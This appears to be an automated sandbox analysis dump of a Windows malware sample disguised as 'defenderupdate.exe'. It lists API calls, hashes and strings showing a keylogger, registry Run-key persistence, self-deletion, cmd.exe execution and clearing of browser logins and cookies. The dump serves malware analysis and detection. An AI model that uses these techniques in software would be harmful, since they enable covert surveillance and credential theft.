                                                                                                • String ID: C:\Users\user\AppData\Roaming\defenderupdate.exe
                                                                                                • API String ID: 2506810119-650212251
                                                                                                • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                • API String ID: 368326130-2663660666
                                                                                                • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                                                • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateExecuteExitFileProcessShell
                                                                                                • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                • API String ID: 2309964880-3562070623
                                                                                                • Opcode ID: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                                                • Opcode Fuzzy Hash: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started
                                                                                                • API String ID: 465354869-4114347211
                                                                                                • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 112202259-1258561607
                                                                                                • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                • String ID: `@
                                                                                                • API String ID: 2583163307-951712118
                                                                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-1507639952
                                                                                                • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,74DF37E0,?), ref: 004127AD
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,74DF37E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                • API String ID: 1818849710-1051519024
                                                                                                • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: Control Panel\Desktop
                                                                                                • API String ID: 1818849710-27424756
                                                                                                • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: TUF
                                                                                                • API String ID: 1818849710-3431404234
                                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                                • API String ID: 1646373207-2714051624
                                                                                                • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                • API String ID: 2574300362-1519888992
                                                                                                • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                APIs
                                                                                                Strings
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                • API String ID: 3472027048-1236744412
                                                                                                • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                                                • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                                                • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                APIs
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                                • String ID: @CG$exepath$BG
                                                                                                • API String ID: 4119054056-3221201242
                                                                                                • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]
                                                                                                • API String ID: 3309952895-93608704
                                                                                                • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                                                • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                                                • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3604237281-0
                                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 737400349-0
                                                                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3919263394-0
                                                                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
